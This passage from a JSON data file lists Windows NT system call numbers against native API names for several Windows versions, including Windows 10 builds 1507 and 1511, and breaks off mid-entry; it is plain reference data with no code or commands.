"NtGetNextThread", "230": "NtGetNlsSectionPtr", "231": "NtGetNotificationResourceManager", "232": "NtGetWriteWatch", "233": "NtImpersonateAnonymousToken", "234": "NtImpersonateThread", "235": "NtInitializeNlsFiles", "236": "NtInitializeRegistry", "237": "NtInitiatePowerAction", "238": "NtIsSystemResumeAutomatic", "239": "NtIsUILanguageComitted", "240": "NtListenPort", "241": "NtLoadDriver", "242": "NtLoadKey", "243": "NtLoadKey2", "244": "NtLoadKeyEx", "245": "NtLockFile", "246": "NtLockProductActivationKeys", "247": "NtLockRegistryKey", "248": "NtLockVirtualMemory", "249": "NtMakePermanentObject", "250": "NtMakeTemporaryObject", "251": "NtMapCMFModule", "252": "NtMapUserPhysicalPages", "253": "NtModifyBootEntry", "254": "NtModifyDriverEntry", "255": "NtNotifyChangeDirectoryFile", "256": "NtNotifyChangeKey", "257": "NtNotifyChangeMultipleKeys", "258": "NtNotifyChangeSession", "259": "NtOpenEnlistment", "260": "NtOpenEventPair", "261": "NtOpenIoCompletion", "262": "NtOpenJobObject", "263": "NtOpenKeyEx", "264": "NtOpenKeyTransacted", "265": "NtOpenKeyTransactedEx", "266": "NtOpenKeyedEvent", "267": "NtOpenMutant", "268": "NtOpenObjectAuditAlarm", "269": "NtOpenPrivateNamespace", "270": "NtOpenProcessToken", "271": "NtOpenResourceManager", "272": "NtOpenSemaphore", "273": "NtOpenSession", "274": "NtOpenSymbolicLinkObject", "275": "NtOpenThread", "276": "NtOpenTimer", "277": "NtOpenTransaction", "278": "NtOpenTransactionManager", "279": "NtPlugPlayControl", "280": "NtPrePrepareComplete", "281": "NtPrePrepareEnlistment", "282": "NtPrepareComplete", "283": "NtPrepareEnlistment", "284": "NtPrivilegeCheck", "285": "NtPrivilegeObjectAuditAlarm", "286": "NtPrivilegedServiceAuditAlarm", "287": "NtPropagationComplete", "288": "NtPropagationFailed", "289": "NtPulseEvent", "290": "NtQueryBootEntryOrder", "291": "NtQueryBootOptions", "292": "NtQueryDebugFilterState", "293": "NtQueryDirectoryObject", "294": "NtQueryDriverEntryOrder", "295": "NtQueryEaFile", "296": "NtQueryFullAttributesFile", "297": "NtQueryInformationAtom", "298": "NtQueryInformationEnlistment", "299": "NtQueryInformationJobObject", "300": "NtQueryInformationPort", "301": "NtQueryInformationResourceManager", "302": "NtQueryInformationTransaction", "303": "NtQueryInformationTransactionManager", "304": "NtQueryInformationWorkerFactory", "305": "NtQueryInstallUILanguage", "306": "NtQueryIntervalProfile", "307": "NtQueryIoCompletion", "308": "NtQueryLicenseValue", "309": "NtQueryMultipleValueKey", "310": "NtQueryMutant", "311": "NtQueryOpenSubKeys", "312": "NtQueryOpenSubKeysEx", "313": "NtQueryPortInformationProcess", "314": "NtQueryQuotaInformationFile", "315": "NtQuerySecurityAttributesToken", "316": "NtQuerySecurityObject", "317": "NtQuerySemaphore", "318": "NtQuerySymbolicLinkObject", "319": "NtQuerySystemEnvironmentValue", "320": "NtQuerySystemEnvironmentValueEx", "321": "NtQuerySystemInformationEx", "322": "NtQueryTimerResolution", "323": "NtQueryWnfStateData", "324": "NtQueryWnfStateNameInformation", "325": "NtQueueApcThreadEx", "326": "NtRaiseException", "327": "NtRaiseHardError", "328": "NtReadOnlyEnlistment", "329": "NtRecoverEnlistment", "330": "NtRecoverResourceManager", "331": "NtRecoverTransactionManager", "332": "NtRegisterProtocolAddressInformation", "333": "NtRegisterThreadTerminatePort", "334": "NtReleaseKeyedEvent", "335": "NtReleaseWorkerFactoryWorker", "336": "NtRemoveIoCompletionEx", "337": "NtRemoveProcessDebug", "338": "NtRenameKey", "339": "NtRenameTransactionManager", "340": "NtReplaceKey", "341": "NtReplacePartitionUnit", "342": "NtReplyWaitReplyPort", "343": "NtRequestPort", "344": "NtResetEvent", "345": "NtResetWriteWatch", "346": "NtRestoreKey", "347": "NtResumeProcess", "348": "NtRollbackComplete", "349": "NtRollbackEnlistment", "350": "NtRollbackTransaction", "351": "NtRollforwardTransactionManager", "352": "NtSaveKey", "353": "NtSaveKeyEx", "354": "NtSaveMergedKeys", "355": "NtSecureConnectPort", "356": "NtSerializeBoot", "357": "NtSetBootEntryOrder", "358": "NtSetBootOptions", "359": "NtSetCachedSigningLevel", "360": "NtSetContextThread", "361": "NtSetDebugFilterState", "362": "NtSetDefaultHardErrorPort", "363": "NtSetDefaultLocale", "364": "NtSetDefaultUILanguage", "365": "NtSetDriverEntryOrder", "366": "NtSetEaFile", "367": "NtSetHighEventPair", "368": "NtSetHighWaitLowEventPair", "369": "NtSetIRTimer", "370": "NtSetInformationDebugObject", "371": "NtSetInformationEnlistment", "372": "NtSetInformationJobObject", "373": "NtSetInformationKey", "374": "NtSetInformationResourceManager", "375": "NtSetInformationToken", "376": "NtSetInformationTransaction", "377": "NtSetInformationTransactionManager", "378": "NtSetInformationVirtualMemory", "379": "NtSetInformationWorkerFactory", "380": "NtSetIntervalProfile", "381": "NtSetIoCompletion", "382": "NtSetIoCompletionEx", "383": "NtSetLdtEntries", "384": "NtSetLowEventPair", "385": "NtSetLowWaitHighEventPair", "386": "NtSetQuotaInformationFile", "387": "NtSetSecurityObject", "388": "NtSetSystemEnvironmentValue", "389": "NtSetSystemEnvironmentValueEx", "390": "NtSetSystemInformation", "391": "NtSetSystemPowerState", "392": "NtSetSystemTime", "393": "NtSetThreadExecutionState", "394": "NtSetTimer2", "395": "NtSetTimerEx", "396": "NtSetTimerResolution", "397": "NtSetUuidSeed", "398": "NtSetVolumeInformationFile", "399": "NtSetWnfProcessNotificationEvent", "400": "NtShutdownSystem", "401": "NtShutdownWorkerFactory", "402": "NtSignalAndWaitForSingleObject", "403": "NtSinglePhaseReject", "404": "NtStartProfile", "405": "NtStopProfile", "406": "NtSubscribeWnfStateChange", "407": "NtSuspendProcess", "408": "NtSuspendThread", "409": "NtSystemDebugControl", "410": "NtTerminateJobObject", "411": "NtTestAlert", "412": "NtThawRegistry", "413": "NtThawTransactions", "414": "NtTraceControl", "415": "NtTranslateFilePath", "416": "NtUmsThreadYield", "417": "NtUnloadDriver", "418": "NtUnloadKey", "419": "NtUnloadKey2", "420": "NtUnloadKeyEx", "421": "NtUnlockFile", "422": "NtUnlockVirtualMemory", "423": "NtUnmapViewOfSectionEx", "424": "NtUnsubscribeWnfStateChange", "425": "NtUpdateWnfStateData", "426": "NtVdmControl", "427": "NtWaitForAlertByThreadId", "428": "NtWaitForDebugEvent", "429": "NtWaitForKeyedEvent", "430": "NtWaitForWorkViaWorkerFactory", "431": "NtWaitHighEventPair", "432": "NtWaitLowEventPair"}}, "Windows 10": {"1507": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientContainerOfPort", "130": "NtAlpcImpersonateClientOfPort", "131": "NtAlpcOpenSenderProcess", "132": "NtAlpcOpenSenderThread", "133": "NtAlpcQueryInformation", "134": "NtAlpcQueryInformationMessage", "135": "NtAlpcRevokeSecurityContext", "136": "NtAlpcSendWaitReceivePort", "137": "NtAlpcSetInformation", "138": "NtAreMappedFilesTheSame", "139": "NtAssignProcessToJobObject", "140": "NtAssociateWaitCompletionPacket", "141": "NtCancelIoFileEx", "142": "NtCancelSynchronousIoFile", "143": "NtCancelTimer2", "144": "NtCancelWaitCompletionPacket", "145": "NtCommitComplete", "146": "NtCommitEnlistment", "147": "NtCommitTransaction", "148": "NtCompactKeys", "149": "NtCompareObjects", "150": "NtCompareTokens", "151": "NtCompleteConnectPort", "152": "NtCompressKey", "153": "NtConnectPort", "154": "NtCreateDebugObject", "155": "NtCreateDirectoryObject", "156": "NtCreateDirectoryObjectEx", "157": "NtCreateEnlistment", "158": "NtCreateEventPair", "159": "NtCreateIRTimer", "160": "NtCreateIoCompletion", "161": "NtCreateJobObject", "162": "NtCreateJobSet", "163": "NtCreateKeyTransacted", "164": "NtCreateKeyedEvent", "165": "NtCreateLowBoxToken", "166": "NtCreateMailslotFile", "167": "NtCreateMutant", "168": "NtCreateNamedPipeFile", "169": "NtCreatePagingFile", "170": "NtCreatePartition", "171": "NtCreatePort", "172": "NtCreatePrivateNamespace", "173": "NtCreateProcess", "174": "NtCreateProfile", "175": "NtCreateProfileEx", "176": "NtCreateResourceManager", "177": "NtCreateSemaphore", "178": "NtCreateSymbolicLinkObject", "179": "NtCreateThreadEx", "180": "NtCreateTimer", "181": "NtCreateTimer2", "182": "NtCreateToken", "183": "NtCreateTokenEx", "184": "NtCreateTransaction", "185": "NtCreateTransactionManager", "186": "NtCreateUserProcess", "187": "NtCreateWaitCompletionPacket", "188": "NtCreateWaitablePort", "189": "NtCreateWnfStateName", "190": "NtCreateWorkerFactory", "191": "NtDebugActiveProcess", "192": "NtDebugContinue", "193": "NtDeleteAtom", "194": "NtDeleteBootEntry", "195": "NtDeleteDriverEntry", "196": "NtDeleteFile", "197": "NtDeleteKey", "198": "NtDeleteObjectAuditAlarm", "199": "NtDeletePrivateNamespace", "200": "NtDeleteValueKey", "201": "NtDeleteWnfStateData", "202": "NtDeleteWnfStateName", "203": "NtDisableLastKnownGood", "204": "NtDisplayString", "205": "NtDrawText", "206": "NtEnableLastKnownGood", "207": "NtEnumerateBootEntries", "208": "NtEnumerateDriverEntries", "209": "NtEnumerateSystemEnvironmentValuesEx", "210": "NtEnumerateTransactionObject", "211": "NtExtendSection", "212": "NtFilterBootOption", "213": "NtFilterToken", "214": "NtFilterTokenEx", "215": "NtFlushBuffersFileEx", "216": "NtFlushInstallUILanguage", "217": "NtFlushInstructionCache", "218": "NtFlushKey", "219": "NtFlushProcessWriteBuffers", "220": "NtFlushVirtualMemory", "221": "NtFlushWriteBuffer", "222": "NtFreeUserPhysicalPages", "223": "NtFreezeRegistry", "224": "NtFreezeTransactions", "225": "NtGetCachedSigningLevel", "226": "NtGetCompleteWnfStateSubscription", "227": "NtGetContextThread", "228": "NtGetCurrentProcessorNumber", "229": "NtGetCurrentProcessorNumberEx", "230": "NtGetDevicePowerState", "231": "NtGetMUIRegistryInfo", "232": "NtGetNextProcess", "233": "NtGetNextThread", "234": "NtGetNlsSectionPtr", "235": "NtGetNotificationResourceManager", "236": "NtGetWriteWatch", "237": "NtImpersonateAnonymousToken", "238": "NtImpersonateThread", "239": "NtInitializeNlsFiles", "240": "NtInitializeRegistry", "241": "NtInitiatePowerAction", "242": "NtIsSystemResumeAutomatic", "243": "NtIsUILanguageComitted", "244": "NtListenPort", "245": "NtLoadDriver", "246": "NtLoadKey", "247": "NtLoadKey2", "248": "NtLoadKeyEx", "249": "NtLockFile", "250": "NtLockProductActivationKeys", "251": "NtLockRegistryKey", "252": "NtLockVirtualMemory", "253": "NtMakePermanentObject", "254": "NtMakeTemporaryObject", "255": "NtManagePartition", "256": "NtMapCMFModule", "257": "NtMapUserPhysicalPages", "258": "NtModifyBootEntry", "259": "NtModifyDriverEntry", "260": "NtNotifyChangeDirectoryFile", "261": "NtNotifyChangeKey", "262": "NtNotifyChangeMultipleKeys", "263": "NtNotifyChangeSession", "264": "NtOpenEnlistment", "265": "NtOpenEventPair", "266": "NtOpenIoCompletion", "267": "NtOpenJobObject", "268": "NtOpenKeyEx", "269": "NtOpenKeyTransacted", "270": "NtOpenKeyTransactedEx", "271": "NtOpenKeyedEvent", "272": "NtOpenMutant", "273": "NtOpenObjectAuditAlarm", "274": "NtOpenPartition", "275": "NtOpenPrivateNamespace", "276": "NtOpenProcessToken", "277": "NtOpenResourceManager", "278": "NtOpenSemaphore", "279": "NtOpenSession", "280": "NtOpenSymbolicLinkObject", "281": "NtOpenThread", "282": "NtOpenTimer", "283": "NtOpenTransaction", "284": "NtOpenTransactionManager", "285": "NtPlugPlayControl", "286": "NtPrePrepareComplete", "287": "NtPrePrepareEnlistment", "288": "NtPrepareComplete", "289": "NtPrepareEnlistment", "290": "NtPrivilegeCheck", "291": "NtPrivilegeObjectAuditAlarm", "292": "NtPrivilegedServiceAuditAlarm", "293": "NtPropagationComplete", "294": "NtPropagationFailed", "295": "NtPulseEvent", "296": "NtQueryBootEntryOrder", "297": "NtQueryBootOptions", "298": "NtQueryDebugFilterState", "299": "NtQueryDirectoryObject", "300": "NtQueryDriverEntryOrder", "301": "NtQueryEaFile", "302": "NtQueryFullAttributesFile", "303": "NtQueryInformationAtom", "304": "NtQueryInformationEnlistment", "305": "NtQueryInformationJobObject", "306": "NtQueryInformationPort", "307": "NtQueryInformationResourceManager", "308": "NtQueryInformationTransaction", "309": "NtQueryInformationTransactionManager", "310": "NtQueryInformationWorkerFactory", "311": "NtQueryInstallUILanguage", "312": "NtQueryIntervalProfile", "313": "NtQueryIoCompletion", "314": "NtQueryLicenseValue", "315": "NtQueryMultipleValueKey", "316": "NtQueryMutant", "317": "NtQueryOpenSubKeys", "318": "NtQueryOpenSubKeysEx", "319": "NtQueryPortInformationProcess", "320": "NtQueryQuotaInformationFile", "321": "NtQuerySecurityAttributesToken", "322": "NtQuerySecurityObject", "323": "NtQuerySemaphore", "324": "NtQuerySymbolicLinkObject", "325": "NtQuerySystemEnvironmentValue", "326": "NtQuerySystemEnvironmentValueEx", "327": "NtQuerySystemInformationEx", "328": "NtQueryTimerResolution", "329": "NtQueryWnfStateData", "330": "NtQueryWnfStateNameInformation", "331": "NtQueueApcThreadEx", "332": "NtRaiseException", "333": "NtRaiseHardError", "334": "NtReadOnlyEnlistment", "335": "NtRecoverEnlistment", "336": "NtRecoverResourceManager", "337": "NtRecoverTransactionManager", "338": "NtRegisterProtocolAddressInformation", "339": "NtRegisterThreadTerminatePort", "340": "NtReleaseKeyedEvent", "341": "NtReleaseWorkerFactoryWorker", "342": "NtRemoveIoCompletionEx", "343": "NtRemoveProcessDebug", "344": "NtRenameKey", "345": "NtRenameTransactionManager", "346": "NtReplaceKey", "347": "NtReplacePartitionUnit", "348": "NtReplyWaitReplyPort", "349": "NtRequestPort", "350": "NtResetEvent", "351": "NtResetWriteWatch", "352": "NtRestoreKey", "353": "NtResumeProcess", "354": "NtRevertContainerImpersonation", "355": "NtRollbackComplete", "356": "NtRollbackEnlistment", "357": "NtRollbackTransaction", "358": "NtRollforwardTransactionManager", "359": "NtSaveKey", "360": "NtSaveKeyEx", "361": "NtSaveMergedKeys", "362": "NtSecureConnectPort", "363": "NtSerializeBoot", "364": "NtSetBootEntryOrder", "365": "NtSetBootOptions", "366": "NtSetCachedSigningLevel", "367": "NtSetContextThread", "368": "NtSetDebugFilterState", "369": "NtSetDefaultHardErrorPort", "370": "NtSetDefaultLocale", "371": "NtSetDefaultUILanguage", "372": "NtSetDriverEntryOrder", "373": "NtSetEaFile", "374": "NtSetHighEventPair", "375": "NtSetHighWaitLowEventPair", "376": "NtSetIRTimer", "377": "NtSetInformationDebugObject", "378": "NtSetInformationEnlistment", "379": "NtSetInformationJobObject", "380": "NtSetInformationKey", "381": "NtSetInformationResourceManager", "382": "NtSetInformationSymbolicLink", "383": "NtSetInformationToken", "384": "NtSetInformationTransaction", "385": "NtSetInformationTransactionManager", "386": "NtSetInformationVirtualMemory", "387": "NtSetInformationWorkerFactory", "388": "NtSetIntervalProfile", "389": "NtSetIoCompletion", "390": "NtSetIoCompletionEx", "391": "NtSetLdtEntries", "392": "NtSetLowEventPair", "393": "NtSetLowWaitHighEventPair", "394": "NtSetQuotaInformationFile", "395": "NtSetSecurityObject", "396": "NtSetSystemEnvironmentValue", "397": "NtSetSystemEnvironmentValueEx", "398": "NtSetSystemInformation", "399": "NtSetSystemPowerState", "400": "NtSetSystemTime", "401": "NtSetThreadExecutionState", "402": "NtSetTimer2", "403": "NtSetTimerEx", "404": "NtSetTimerResolution", "405": "NtSetUuidSeed", "406": "NtSetVolumeInformationFile", "407": "NtSetWnfProcessNotificationEvent", "408": "NtShutdownSystem", "409": "NtShutdownWorkerFactory", "410": "NtSignalAndWaitForSingleObject", "411": "NtSinglePhaseReject", "412": "NtStartProfile", "413": "NtStopProfile", "414": "NtSubscribeWnfStateChange", "415": "NtSuspendProcess", "416": "NtSuspendThread", "417": "NtSystemDebugControl", "418": "NtTerminateJobObject", "419": "NtTestAlert", "420": "NtThawRegistry", "421": "NtThawTransactions", "422": "NtTraceControl", "423": "NtTranslateFilePath", "424": "NtUmsThreadYield", "425": "NtUnloadDriver", "426": "NtUnloadKey", "427": "NtUnloadKey2", "428": "NtUnloadKeyEx", "429": "NtUnlockFile", "430": "NtUnlockVirtualMemory", "431": "NtUnmapViewOfSectionEx", "432": "NtUnsubscribeWnfStateChange", "433": "NtUpdateWnfStateData", "434": "NtVdmControl", "435": "NtWaitForAlertByThreadId", "436": "NtWaitForDebugEvent", "437": "NtWaitForKeyedEvent", "438": "NtWaitForWorkViaWorkerFactory", "439": "NtWaitHighEventPair", "440": "NtWaitLowEventPair"}, "1511": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientContainerOfPort", "130": "NtAlpcImpersonateClientOfPort", "131": "NtAlpcOpenSenderProcess", "132": "NtAlpcOpenSenderThread", "133": "NtAlpcQueryInformation", "134": "NtAlpcQueryInformationMessage", "135": "NtAlpcRevokeSecurityContext", "136": "NtAlpcSendWaitReceivePort", "137": "NtAlpcSetInformation", "138": "NtAreMappedFilesTheSame", "139": "NtAssignProcessToJobObject", "140": "NtAssociateWaitCompletionPacket", "141": "NtCancelIoFileEx", "142": "NtCancelSynchronousIoFile", "143": "NtCancelTimer2", "144": "NtCancelWaitCompletionPacket", "145": "NtCommitComplete", "146": "NtCommitEnlistment", "147": "NtCommitTransaction", "148": "NtCompactKeys", "149": "NtCompareObjects", "150": "NtCompareTokens", "151": "NtCompleteConnectPort", "152": "NtCompressKey", "153": "NtConnectPort", "154": "NtCreateDebugObject", "155": "NtCreateDirectoryObject", "156": "NtCreateDirectoryObjectEx", "157": "NtCreateEnclave", "158": "NtCreateEnlistment", "159": "NtCreateEventPair", "160": "NtCreateIRTimer", "161": "NtCreateIoCompletion", "162": "NtCreateJobObject", "163": "NtCreateJobSet", "164": "NtCreateKeyTransacted", "165": "NtCreateKeyedEvent", "166": "NtCreateLowBoxToken", "167": "NtCreateMailslotFile", "168": "NtCreateMutant", "169": "NtCreateNamedPipeFile", "170": "NtCreatePagingFile", "171": "NtCreatePartition", "172": "NtCreatePort", "173": "NtCreatePrivateNamespace", "174": "NtCreateProcess", "175": "NtCreateProfile", "176": "NtCreateProfileEx", "177": "NtCreateResourceManager", "178": "NtCreateSemaphore", "179": "NtCreateSymbolicLinkObject", "180": "NtCreateThreadEx", "181": "NtCreateTimer", "182": "NtCreateTimer2", "183": "NtCreateToken", "184": "NtCreateTokenEx", "185": "NtCreateTransaction", "186": "NtCreateTransactionManager", "187": "NtCreateUserProcess", "188": "NtCreateWaitCompletionPacket", "189": "NtCreateWaitablePort", "190": "NtCreateWnfStateName", "191": "NtCreateWorkerFactory", "192": "NtDebugActiveProcess", "193": "NtDebugContinue", "194": "NtDeleteAtom", "195": "NtDeleteBootEntry", "196": "NtDeleteDriverEntry", "197": "NtDeleteFile", "198": "NtDeleteKey", "199": "NtDeleteObjectAuditAlarm", "200": "NtDeletePrivateNamespace", "201": "NtDeleteValueKey", "202": "NtDeleteWnfStateData", "203": "NtDeleteWnfStateName", "204": "NtDisableLastKnownGood", "205": "NtDisplayString", "206": "NtDrawText", "207": "NtEnableLastKnownGood", "208": "NtEnumerateBootEntries", "209": "NtEnumerateDriverEntries", "210": "NtEnumerateSystemEnvironmentValuesEx", "211": "NtEnumerateTransactionObject", "212": "NtExtendSection", "213": "NtFilterBootOption", "214": "NtFilterToken", "215": "NtFilterTokenEx", "216": "NtFlushBuffersFileEx", "217": "NtFlushInstallUILanguage", "218": "NtFlushInstructionCache", "219": "NtFlushKey", "220": "NtFlushProcessWriteBuffers", "221": "NtFlushVirtualMemory", "222": "NtFlushWriteBuffer", "223": "NtFreeUserPhysicalPages", "224": "NtFreezeRegistry", "225": "NtFreezeTransactions", "226": "NtGetCachedSigningLevel", "227": "NtGetCompleteWnfStateSubscription", "228": "NtGetContextThread", "229": "NtGetCurrentProcessorNumber", "230": "NtGetCurrentProcessorNumberEx", "231": "NtGetDevicePowerState", "232": "NtGetMUIRegistryInfo", "233": "NtGetNextProcess", "234": "NtGetNextThread", "235": "NtGetNlsSectionPtr", "236": "NtGetNotificationResourceManager", "237": "NtGetWriteWatch", "238": "NtImpersonateAnonymousToken", "239": "NtImpersonateThread", "240": "NtInitializeEnclave", "241": "NtInitializeNlsFiles", "242": "NtInitializeRegistry", "243": "NtInitiatePowerAction", "244": "NtIsSystemResumeAutomatic", "245": "NtIsUILanguageComitted", "246": "NtListenPort", "247": "NtLoadDriver", "248": "NtLoadEnclaveData", "249": "NtLoadKey", "250": "NtLoadKey2", "251": "NtLoadKeyEx", "252": "NtLockFile", "253": "NtLockProductActivationKeys", "254": "NtLockRegistryKey", "255": "NtLockVirtualMemory", "256": "NtMakePermanentObject", "257": "NtMakeTemporaryObject", "258": "NtManagePartition", "259": "NtMapCMFModule", "260": "NtMapUserPhysicalPages", "261": "NtModifyBootEntry", "262": "NtModifyDriverEntry", "263": "NtNotifyChangeDirectoryFile", "264": "NtNotifyChangeKey", "265": "NtNotifyChangeMultipleKeys", "266": "NtNotifyChangeSession", "267": "NtOpenEnlistment", "268": "NtOpenEventPair", "269": "NtOpenIoCompletion", "270": "NtOpenJobObject", "271": "NtOpenKeyEx", "272": "NtOpenKeyTransacted", "273": "NtOpenKeyTransactedEx", "274": "NtOpenKeyedEvent", "275": "NtOpenMutant", "276": "NtOpenObjectAuditAlarm", "277": "NtOpenPartition", "278": "NtOpenPrivateNamespace", "279": "NtOpenProcessToken", "280": "NtOpenResourceManager", "281": "NtOpenSemaphore", "282": "NtOpenSession", "283": "NtOpenSymbolicLinkObject", "284": "NtOpenThread", "285": "NtOpenTimer", "286": 